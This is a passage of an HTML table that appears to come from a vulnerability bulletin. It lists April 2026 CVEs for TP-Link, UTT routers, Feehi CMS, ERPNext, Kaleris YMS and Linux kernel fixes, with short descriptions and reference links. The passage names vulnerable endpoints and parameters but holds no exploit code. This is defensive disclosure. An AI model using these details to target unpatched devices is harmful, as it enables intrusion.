    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-30817" target="_blank" rel="noopener">CVE-2026-30817</a></td>

    <a href="https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware" target="_blank" rel="noopener">https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware</a><br><a href="https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware" target="_blank" rel="noopener">https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware</a><br><a href="https://talosintelligence.com/vulnerability_reports/" target="_blank" rel="noopener">https://talosintelligence.com/vulnerability_reports/</a><br><a href="https://www.tp-link.com/us/support/faq/5055/" target="_blank" rel="noopener">https://www.tp-link.com/us/support/faq/5055/</a></td>
    </tr>

    <td class="vendor-product">TP-Link Systems Inc.--AX53 v1.0</td>
    <td>An OS command injection vulnerability in the dnsmasq module of TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to execute arbitrary code when a specially crafted configuration file is processed due to insufficient input validation. Successful exploitation may allow the attacker to modify device configuration, access sensitive information, or further compromise system integrity. This issue affects AX53 v1.0: before 1.7.1 Build 20260213.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-30818" target="_blank" rel="noopener">CVE-2026-30818</a></td>

    <a href="https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware" target="_blank" rel="noopener">https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware</a><br><a href="https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware" target="_blank" rel="noopener">https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware</a><br><a href="https://talosintelligence.com/vulnerability_reports/" target="_blank" rel="noopener">https://talosintelligence.com/vulnerability_reports/</a><br><a href="https://www.tp-link.com/us/support/faq/5055/" target="_blank" rel="noopener">https://www.tp-link.com/us/support/faq/5055/</a></td>
    </tr>

    <td class="vendor-product">n/a--n/a</td>
    <td>A Server-Side Request Forgery (SSRF) vulnerability exists in the Print Format functionality of ERPNext v16.0.1 and Frappe Framework v16.1.1, where user-supplied HTML is insufficiently sanitized before being rendered into PDF. When generating PDFs from user-controlled HTML content, the application allows the inclusion of HTML elements such as &lt;iframe&gt; that reference external resources. The PDF rendering engine automatically fetches these resources on the server side. An attacker can abuse this behavior to force the server to make arbitrary HTTP requests to internal services, including cloud metadata endpoints, potentially leading to sensitive information disclosure.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31017" target="_blank" rel="noopener">CVE-2026-31017</a></td>

    <a href="http://frappe.com" target="_blank" rel="noopener">http://frappe.com</a><br><a href="https://github.com/PhDg1410/CVE/tree/main/CVE-2026-31017" target="_blank" rel="noopener">https://github.com/PhDg1410/CVE/tree/main/CVE-2026-31017</a></td>
    </tr>

    <td class="vendor-product">n/a--n/a</td>
    <td>A vulnerability was identified in stata-mcp prior to v1.13.0 where insufficient validation of user-supplied Stata do-file content can lead to command execution.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31040" target="_blank" rel="noopener">CVE-2026-31040</a></td>

    <a href="https://github.com/SepineTam/stata-mcp/issues/20" target="_blank" rel="noopener">https://github.com/SepineTam/stata-mcp/issues/20</a><br><a href="https://github.com/SepineTam/stata-mcp/pull/21" target="_blank" rel="noopener">https://github.com/SepineTam/stata-mcp/pull/21</a><br><a href="https://github.com/SepineTam/stata-mcp/commit/52413ce" target="_blank" rel="noopener">https://github.com/SepineTam/stata-mcp/commit/52413ce</a><br><a href="https://github.com/SepineTam/stata-mcp/releases/tag/v1.13.0" target="_blank" rel="noopener">https://github.com/SepineTam/stata-mcp/releases/tag/v1.13.0</a></td>
    </tr>

    <td class="vendor-product">n/a--n/a</td>
    <td>A double free vulnerability exists in librz/bin/format/le/le.c in the function le_load_fixup_record(). When processing malformed or circular LE fixup chains, relocation entries may be freed multiple times during error handling. A specially crafted LE binary can trigger heap corruption and cause the application to crash, resulting in a denial-of-service condition. An attacker with a crafted binary could cause a denial of service when the tool is integrated into a service pipeline.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31053" target="_blank" rel="noopener">CVE-2026-31053</a></td>

    <a href="https://github.com/rizinorg/rizin/issues/5753" target="_blank" rel="noopener">https://github.com/rizinorg/rizin/issues/5753</a><br><a href="https://github.com/rizinorg/rizin/pull/5795" target="_blank" rel="noopener">https://github.com/rizinorg/rizin/pull/5795</a></td>
    </tr>

    <td class="vendor-product">n/a-- Aggressive HiPER Router 1200GW</td>
    <td>UTT Aggressive HiPER 1200GW v2.5.3-170306 was discovered to contain a buffer overflow in the timeRangeName parameter of the formConfigDnsFilterGlobal function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31058" target="_blank" rel="noopener">CVE-2026-31058</a></td>

    <a href="https://github.com/zxq0408/Vul202601/blob/main/2.md" target="_blank" rel="noopener">https://github.com/zxq0408/Vul202601/blob/main/2.md</a></td>
    </tr>

    <td class="vendor-product">n/a-- Aggressive HiPER Router 520W</td>
    <td>A remote command execution (RCE) vulnerability in the /goform/formDia component of UTT Aggressive HiPER 520W v3v1.7.7-180627 allows attackers to execute arbitrary commands via a crafted string.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31059" target="_blank" rel="noopener">CVE-2026-31059</a></td>

    <a href="https://github.com/zxq0408/Vul202601/blob/main/9.md" target="_blank" rel="noopener">https://github.com/zxq0408/Vul202601/blob/main/9.md</a></td>
    </tr>

    <td class="vendor-product">n/a-- Aggressive HiPER Router 810G</td>
    <td>UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a buffer overflow in the notes parameter of the formGroupConfig function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31060" target="_blank" rel="noopener">CVE-2026-31060</a></td>

    <a href="https://github.com/zxq0408/Vul202601/blob/main/5.md" target="_blank" rel="noopener">https://github.com/zxq0408/Vul202601/blob/main/5.md</a></td>
    </tr>

    <td class="vendor-product">n/a-- Aggressive HiPER Router 810G</td>
    <td>UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a buffer overflow in the timestart parameter of the ConfigAdvideo function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31061" target="_blank" rel="noopener">CVE-2026-31061</a></td>

    <a href="https://github.com/zxq0408/Vul202601/blob/main/1.md" target="_blank" rel="noopener">https://github.com/zxq0408/Vul202601/blob/main/1.md</a></td>
    </tr>

    <td class="vendor-product">n/a-- Aggressive HiPER Router 510W</td>
    <td>UTT Aggressive 520W v3v1.7.7-180627 was discovered to contain a buffer overflow in the filename parameter of the formFtpServerDirConfig function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31062" target="_blank" rel="noopener">CVE-2026-31062</a></td>

    <a href="https://github.com/zxq0408/Vul202601/blob/main/7.md" target="_blank" rel="noopener">https://github.com/zxq0408/Vul202601/blob/main/7.md</a></td>
    </tr>

    <td class="vendor-product">n/a-- Aggressive HiPER Router 1200GW</td>
    <td>UTT Aggressive HiPER 1200GW v2.5.3-170306 was discovered to contain a buffer overflow in the pools parameter of the formArpBindConfig function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31063" target="_blank" rel="noopener">CVE-2026-31063</a></td>

    <a href="https://github.com/zxq0408/Vul202601/blob/main/4.md" target="_blank" rel="noopener">https://github.com/zxq0408/Vul202601/blob/main/4.md</a></td>
    </tr>

    <td class="vendor-product">n/a-- Aggressive HiPER Router 520W</td>
    <td>UTT Aggressive 520W v3v1.7.7-180627 was discovered to contain a buffer overflow in the addCommand parameter of the formConfigCliForEngineerOnly function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31065" target="_blank" rel="noopener">CVE-2026-31065</a></td>

    <a href="https://github.com/zxq0408/Vul202601/blob/main/8.md" target="_blank" rel="noopener">https://github.com/zxq0408/Vul202601/blob/main/8.md</a></td>
    </tr>

    <td class="vendor-product">n/a-- Aggressive HiPER Router 810G</td>
    <td>UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a buffer overflow in the selDateType parameter of the formTaskEdit function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31066" target="_blank" rel="noopener">CVE-2026-31066</a></td>

    <a href="https://github.com/zxq0408/Vul202601/blob/main/6.md" target="_blank" rel="noopener">https://github.com/zxq0408/Vul202601/blob/main/6.md</a></td>
    </tr>

    <td class="vendor-product">n/a-- UTT Aggressive 520W</td>
    <td>A remote command execution (RCE) vulnerability in the /goform/formReleaseConnect component of UTT Aggressive 520W v3v1.7.7-180627 allows attackers to execute arbitrary commands via a crafted string.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31067" target="_blank" rel="noopener">CVE-2026-31067</a></td>

    <a href="https://github.com/zxq0408/Vul202601/blob/main/10.md" target="_blank" rel="noopener">https://github.com/zxq0408/Vul202601/blob/main/10.md</a></td>
    </tr>

    <td class="vendor-product">n/a-- Kaleris YMS</td>
    <td>Incorrect access control in Kaleris YMS v7.2.2.1 allows authenticated attackers with only the shipping/receiving role to view the truck's dashboard resources.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31150" target="_blank" rel="noopener">CVE-2026-31150</a></td>

    <a href="https://kaleris.com/solutions/yard-management/" target="_blank" rel="noopener">https://kaleris.com/solutions/yard-management/</a><br><a href="https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31150" target="_blank" rel="noopener">https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31150</a></td>
    </tr>

    <td class="vendor-product">n/a-- Kaleris YMS</td>
    <td>An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass login verification to access the application's resources.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31151" target="_blank" rel="noopener">CVE-2026-31151</a></td>

    <a href="https://kaleris.com/solutions/yard-management/" target="_blank" rel="noopener">https://kaleris.com/solutions/yard-management/</a><br><a href="https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31151" target="_blank" rel="noopener">https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31151</a></td>
    </tr>

    <td class="vendor-product">Bynder[.]com -- Bynder v0.1.394</td>
    <td>A stored cross-site scripting (XSS) vulnerability in Bynder v0.1.394 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31153" target="_blank" rel="noopener">CVE-2026-31153</a></td>

    <a href="https://www.bynder.com/en/" target="_blank" rel="noopener">https://www.bynder.com/en/</a><br><a href="https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31153" target="_blank" rel="noopener">https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31153</a></td>
    </tr>

    <td class="vendor-product">Totolink[.]net -- A3300R router</td>
    <td>An issue was discovered in ToToLink A3300R firmware v17.0.0cu.557_B20221024 allowing attackers to execute arbitrary commands via the stun-pass parameter to /cgi-bin/cstecgi.cgi.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31170" target="_blank" rel="noopener">CVE-2026-31170</a></td>

    <a href="https://github.com/Svigo-o/TOTOLINK-Vul/tree/main/totolink-a3300r-stun-pass-cmd-injection" target="_blank" rel="noopener">https://github.com/Svigo-o/TOTOLINK-Vul/tree/main/totolink-a3300r-stun-pass-cmd-injection</a></td>
    </tr>

    <td class="vendor-product">Altenar[.]com -- Sportsbook Software Platform SB2 v.2.0</td>
    <td>Cross Site Scripting vulnerability in Altenar Sportsbook Software Platform (SB2) v.2.0 allows a remote attacker to obtain sensitive information and execute arbitrary code via the URL parameter.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31262" target="_blank" rel="noopener">CVE-2026-31262</a></td>

    <a href="https://github.com/nikolas-ch/CVEs/tree/main/Altenar_SportsBook_Platform_SB2/ORtoXSS" target="_blank" rel="noopener">https://github.com/nikolas-ch/CVEs/tree/main/Altenar_SportsBook_Platform_SB2/ORtoXSS</a><br><a href="https://github.com/nikolas-ch/CVEs/blob/main/Altenar_SportsBook_Platform_SB2/ORtoXSS/ORtoXSS.txt" target="_blank" rel="noopener">https://github.com/nikolas-ch/CVEs/blob/main/Altenar_SportsBook_Platform_SB2/ORtoXSS/ORtoXSS.txt</a></td>
    </tr>

    <td class="vendor-product">n/a--n/a</td>
    <td>megagao production_ssm v1.0 contains an authorization bypass vulnerability in the user addition functionality. The insert() method in UserController.java lacks authentication checks, allowing unauthenticated attackers to create super administrator accounts by directly accessing the /user/insert endpoint. This leads to complete system compromise.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31271" target="_blank" rel="noopener">CVE-2026-31271</a></td>

    <a href="https://github.com/clockw1se0v0/Vul/blob/main/production_ssm/Unauthorized.md" target="_blank" rel="noopener">https://github.com/clockw1se0v0/Vul/blob/main/production_ssm/Unauthorized.md</a></td>
    </tr>

    <td class="vendor-product">n/a--n/a</td>
    <td>MRCMS 3.1.2 contains an access control vulnerability. The save() method in src/main/java/org/marker/mushroom/controller/UserController.java lacks proper authorization validation, enabling direct addition of super administrator accounts without authentication.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31272" target="_blank" rel="noopener">CVE-2026-31272</a></td>

    <a href="https://github.com/clockw1se0v0/Vul/blob/main/MRCMS/Unauthorized.md" target="_blank" rel="noopener">https://github.com/clockw1se0v0/Vul/blob/main/MRCMS/Unauthorized.md</a></td>
    </tr>

    <td class="vendor-product">n/a-- Feehi CMS</td>
    <td>An authenticated stored cross-site scripting (XSS) vulnerability in the creation/editing module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Content field.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31313" target="_blank" rel="noopener">CVE-2026-31313</a></td>

    <a href="http://feehi.com" target="_blank" rel="noopener">http://feehi.com</a><br><a href="https://github.com/liufee/cms/issues/80" target="_blank" rel="noopener">https://github.com/liufee/cms/issues/80</a></td>
    </tr>

    <td class="vendor-product">n/a-- Feehi CMS</td>
    <td>An authenticated stored cross-site scripting (XSS) vulnerability in Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Page Sign parameter.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31350" target="_blank" rel="noopener">CVE-2026-31350</a></td>

    <a href="https://github.com/liufee/cms" target="_blank" rel="noopener">https://github.com/liufee/cms</a><br><a href="https://github.com/liufee/cms/issues/82" target="_blank" rel="noopener">https://github.com/liufee/cms/issues/82</a></td>
    </tr>

    <td class="vendor-product">n/a-- Feehi CMS</td>
    <td>An authenticated stored cross-site scripting (XSS) vulnerability in the creation/editing module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Title parameter.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31351" target="_blank" rel="noopener">CVE-2026-31351</a></td>

    <a href="https://github.com/liufee/cms" target="_blank" rel="noopener">https://github.com/liufee/cms</a><br><a href="https://github.com/liufee/cms/issues/81" target="_blank" rel="noopener">https://github.com/liufee/cms/issues/81</a></td>
    </tr>

    <td class="vendor-product">n/a-- Feehi CMS</td>
    <td>An authenticated stored cross-site scripting (XSS) vulnerability in the Role Management module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Role Name parameter.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31352" target="_blank" rel="noopener">CVE-2026-31352</a></td>

    <a href="https://github.com/liufee/cms" target="_blank" rel="noopener">https://github.com/liufee/cms</a><br><a href="https://github.com/liufee/cms/issues/83" target="_blank" rel="noopener">https://github.com/liufee/cms/issues/83</a></td>
    </tr>

    <td class="vendor-product">n/a-- Feehi CMS</td>
    <td>An authenticated stored cross-site scripting (XSS) vulnerability in the Category module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name parameter.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31353" target="_blank" rel="noopener">CVE-2026-31353</a></td>

    <a href="https://github.com/liufee/cms" target="_blank" rel="noopener">https://github.com/liufee/cms</a><br><a href="https://github.com/liufee/cms/issues/84" target="_blank" rel="noopener">https://github.com/liufee/cms/issues/84</a></td>
    </tr>

    <td class="vendor-product">n/a-- Feehi CMS</td>
    <td>Multiple authenticated stored cross-site scripting (XSS) vulnerabilities in the Permissions module of Feehi CMS v2.1.1 allow attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Group, Category or Description parameters.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31354" target="_blank" rel="noopener">CVE-2026-31354</a></td>

    <a href="https://github.com/liufee/cms" target="_blank" rel="noopener">https://github.com/liufee/cms</a><br><a href="https://github.com/liufee/cms/issues/85" target="_blank" rel="noopener">https://github.com/liufee/cms/issues/85</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Linux--Linux</td>
    <td>In the Linux kernel, the following vulnerability has been resolved: media: dvb-net: fix OOB access in ULE extension header tables The ule_mandatory_ext_handlers[] and ule_optional_ext_handlers[] tables in handle_one_ule_extension() are declared with 255 elements (valid indices 0-254), but the index htype is derived from network-controlled data as (ule_sndu_type &amp; 0x00FF), giving a range of 0-255. When htype equals 255, an out-of-bounds read occurs on the function pointer table, and the OOB value may be called as a function pointer. Add a bounds check on htype against the array size before either table is accessed. Out-of-range values now cause the SNDU to be discarded.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31405" target="_blank" rel="noopener">CVE-2026-31405</a></td>
    <td><a href="https://git.kernel.org/stable/c/29ef43ceb121d67b87f4cbb08439e4e9e732eff8" target="_blank" rel="noopener">https://git.kernel.org/stable/c/29ef43ceb121d67b87f4cbb08439e4e9e732eff8</a><br><a href="https://git.kernel.org/stable/c/1a6da3dbb9985d00743073a1cc1f96e59f5abc30" target="_blank" rel="noopener">https://git.kernel.org/stable/c/1a6da3dbb9985d00743073a1cc1f96e59f5abc30</a><br><a href="https://git.kernel.org/stable/c/145e50c2c700fa52b840df7bab206043997dd18e" target="_blank" rel="noopener">https://git.kernel.org/stable/c/145e50c2c700fa52b840df7bab206043997dd18e</a><br><a href="https://git.kernel.org/stable/c/8bde543d2a5f935ba2a6a6325a2e02f8a9256fbe" target="_blank" rel="noopener">https://git.kernel.org/stable/c/8bde543d2a5f935ba2a6a6325a2e02f8a9256fbe</a><br><a href="https://git.kernel.org/stable/c/f2b65dcb78c8990e4c68a906627433be1fe38a92" target="_blank" rel="noopener">https://git.kernel.org/stable/c/f2b65dcb78c8990e4c68a906627433be1fe38a92</a><br><a href="https://git.kernel.org/stable/c/24d87712727a5017ad142d63940589a36cd25647" target="_blank" rel="noopener">https://git.kernel.org/stable/c/24d87712727a5017ad142d63940589a36cd25647</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Linux--Linux</td>
    <td>In the Linux kernel, the following vulnerability has been resolved: xfrm: Fix work re-schedule after cancel in xfrm_nat_keepalive_net_fini() After cancel_delayed_work_sync() is called from xfrm_nat_keepalive_net_fini(), xfrm_state_fini() flushes remaining states via __xfrm_state_delete(), which calls xfrm_nat_keepalive_state_updated() to re-schedule nat_keepalive_work. The following is a simple race scenario: cpu0 cpu1 cleanup_net() [Round 1] ops_undo_list() xfrm_net_exit() xfrm_nat_keepalive_net_fini() cancel_delayed_work_sync(nat_keepalive_work); xfrm_state_fini() xfrm_state_flush() xfrm_state_delete(x) __xfrm_state_delete(x) xfrm_nat_keepalive_state_updated(x) schedule_delayed_work(nat_keepalive_work); rcu_barrier(); net_complete_free(); net_passive_dec(net); llist_add(&amp;net-&gt;defer_free_list, &amp;defer_free_list); cleanup_net() [Round 2] rcu_barrier(); net_complete_free() kmem_cache_free(net_cachep, net); nat_keepalive_work() // on freed net To prevent this, cancel_delayed_work_sync() is replaced with disable_delayed_work_sync().</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31406" target="_blank" rel="noopener">CVE-2026-31406</a></td>
    <td><a href="https://git.kernel.org/stable/c/32d0f44c2f14d60fe8e920e69a28c11051543ec1" target="_blank" rel="noopener">https://git.kernel.org/stable/c/32d0f44c2f14d60fe8e920e69a28c11051543ec1</a><br><a href="https://git.kernel.org/stable/c/2255ed6adbc3100d2c4a83abd9d0396d04b87792" target="_blank" rel="noopener">https://git.kernel.org/stable/c/2255ed6adbc3100d2c4a83abd9d0396d04b87792</a><br><a href="https://git.kernel.org/stable/c/21f2fc49ca6faa393c31da33b8a4e6c41fc84c13" target="_blank" rel="noopener">https://git.kernel.org/stable/c/21f2fc49ca6faa393c31da33b8a4e6c41fc84c13</a><br><a href="https://git.kernel.org/stable/c/daf8e3b253aa760ff9e96c7768a464bc1d6b3c90" target="_blank" rel="noopener">https://git.kernel.org/stable/c/daf8e3b253aa760ff9e96c7768a464bc1d6b3c90</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Linux--Linux</td>
    <td>In the Linux kernel, the following vulnerability has been resolved: netfilter: conntrack: add missing netlink policy validations Hyunwoo Kim reports out-of-bounds access in sctp and ctnetlink. These attributes are used by the kernel without any validation. Extend the netlink policies accordingly. Quoting the reporter: nlattr_to_sctp() assigns the user-supplied CTA_PROTOINFO_SCTP_STATE value directly to ct-&gt;proto.sctp.state without checking that it is within the valid range. [..] and: ... with exp-&gt;dir = 100, the access at ct-&gt;master-&gt;tuplehash[100] reads 5600 bytes past the start of a 320-byte nf_conn object, causing a slab-out-of-bounds read confirmed by UBSAN.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31407" target="_blank" rel="noopener">CVE-2026-31407</a></td>
    <td><a href="https://git.kernel.org/stable/c/0fbae1e74493d5a160a70c51aeba035d8266ea7d" target="_blank" rel="noopener">https://git.kernel.org/stable/c/0fbae1e74493d5a160a70c51aeba035d8266ea7d</a><br><a href="https://git.kernel.org/stable/c/f900e1d77ee0ef87bfb5ab3fe60f0b3d8ad5ba05" target="_blank" rel="noopener">https://git.kernel.org/stable/c/f900e1d77ee0ef87bfb5ab3fe60f0b3d8ad5ba05</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Linux--Linux</td>
    <td>In the Linux kernel, the following vulnerability has been resolved: Bluetooth: SCO: Fix use-after-free in sco_recv_frame() due to missing sock_hold sco_recv_frame() reads conn-&gt;sk under sco_conn_lock() but immediately releases the lock without holding a reference to the socket. A concurrent close() can free the socket between the lock release and the subsequent sk-&gt;sk_state access, resulting in a use-after-free. Other functions in the same file (sco_sock_timeout(), sco_conn_del()) correctly use sco_sock_hold() to safely hold a reference under the lock. Fix by using sco_sock_hold() to take a reference before releasing the lock, and adding sock_put() on all exit paths.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31408" target="_blank" rel="noopener">CVE-2026-31408</a></td>
    <td><a href="https://git.kernel.org/stable/c/b0a7da0e3f7442545f071499beb36374714bb9de" target="_blank" rel="noopener">https://git.kernel.org/stable/c/b0a7da0e3f7442545f071499beb36374714bb9de</a><br><a href="https://git.kernel.org/stable/c/45aaca995e4a7a05b272a58e7ab2fff4f611b8f1" target="_blank" rel="noopener">https://git.kernel.org/stable/c/45aaca995e4a7a05b272a58e7ab2fff4f611b8f1</a><br><a href="https://git.kernel.org/stable/c/108b81514d8f2535eb16651495cefb2250528db3" target="_blank" rel="noopener">https://git.kernel.org/stable/c/108b81514d8f2535eb16651495cefb2250528db3</a><br><a href="https://git.kernel.org/stable/c/7197462e90b8ce15caa1ae15d4bc2bb8cd21b11e" target="_blank" rel="noopener">https://git.kernel.org/stable/c/7197462e90b8ce15caa1ae15d4bc2bb8cd21b11e</a><br><a href="https://git.kernel.org/stable/c/e76e8f0581ef555eacc11dbb095e602fb30a5361" target="_blank" rel="noopener">https://git.kernel.org/stable/c/e76e8f0581ef555eacc11dbb095e602fb30a5361</a><br><a href="https://git.kernel.org/stable/c/598dbba9919c5e36c54fe1709b557d64120cb94b" target="_blank" rel="noopener">https://git.kernel.org/stable/c/598dbba9919c5e36c54fe1709b557d64120cb94b</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Linux--Linux</td>
    <td>In the Linux kernel, the following vulnerability has been resolved: ksmbd: unset conn-&gt;binding on failed binding request When a multichannel SMB2_SESSION_SETUP request with SMB2_SESSION_REQ_FLAG_BINDING fails, ksmbd sets conn-&gt;binding = true but never clears it on the error path. This leaves the connection in a binding state where all subsequent ksmbd_session_lookup_all() calls fall back to the global sessions table. This fixes it by clearing conn-&gt;binding = false in the error path.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31409" target="_blank" rel="noopener">CVE-2026-31409</a></td>
    <td><a href="https://git.kernel.org/stable/c/d073870dab8f6dadced81d13d273ff0b21cb7f4e" target="_blank" rel="noopener">https://git.kernel.org/stable/c/d073870dab8f6dadced81d13d273ff0b21cb7f4e</a><br><a href="https://git.kernel.org/stable/c/6ebef4a220a1ebe345de899ebb9ae394206fe921" target="_blank" rel="noopener">https://git.kernel.org/stable/c/6ebef4a220a1ebe345de899ebb9ae394206fe921</a><br><a href="https://git.kernel.org/stable/c/89afe5e2dbea6e9d8e5f11324149d06fa3a4efca" target="_blank" rel="noopener">https://git.kernel.org/stable/c/89afe5e2dbea6e9d8e5f11324149d06fa3a4efca</a><br><a href="https://git.kernel.org/stable/c/9feb2d1bf86d9e5e66b8565f37f8d3a7d281a772" target="_blank" rel="noopener">https://git.kernel.org/stable/c/9feb2d1bf86d9e5e66b8565f37f8d3a7d281a772</a><br><a href="https://git.kernel.org/stable/c/6260fc85ed1298a71d24a75d01f8b2e56d489a60" target="_blank" rel="noopener">https://git.kernel.org/stable/c/6260fc85ed1298a71d24a75d01f8b2e56d489a60</a><br><a href="https://git.kernel.org/stable/c/282343cf8a4a5a3603b1cb0e17a7083e4a593b03" target="_blank" rel="noopener">https://git.kernel.org/stable/c/282343cf8a4a5a3603b1cb0e17a7083e4a593b03</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Linux--Linux</td>
    <td>In the Linux kernel, the following vulnerability has been resolved: ksmbd: use volume UUID in FS_OBJECT_ID_INFORMATION Use sb-&gt;s_uuid for a proper volume identifier as the primary choice. For filesystems that do not provide a UUID, fall back to stfs.f_fsid obtained from vfs_statfs().</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-31410" target="_blank" rel="noopener">CVE-2026-31410</a></td>
    <td><a href="https://git.kernel.org/stable/c/ce00616bc1df675bfdacc968f2bf7c51f4669227" target="_blank" rel="noopener">https://git.kernel.org/stable/c/ce00616bc1df675bfdacc968f2bf7c51f4669227</a><br><a href="https://git.kernel.org/stable/c/3d80ebe6d1b7bc9ad20fd9b0c1a0c56d804f8a0a" target="_blank" rel="noopener">https://git.kernel.org/stable/c/3d80ebe6d1b7bc9ad20fd9b0c1a0c56d804f8a0a</a><br><a href="https://git.kernel.org/stable/c/c283a6ffe6d5d6e5594d991286b9ce15951572e1" target="_blank" rel="noopener">https://git.kernel.org/stable/c/c283a6ffe6d5d6e5594d991286b9ce15951572e1</a><br><a href="https://git.kernel.org/stable/c/3a64125730cabc34fccfbc230c2667c2e14f7308" target="_blank" rel="noopener">https://git.kernel.org/stable/c/3a64125730cabc34fccfbc230c2667c2e14f7308</a></td>
    </tr>

    <tr>
    <td class="vendor-product">Linux--Linux</td>
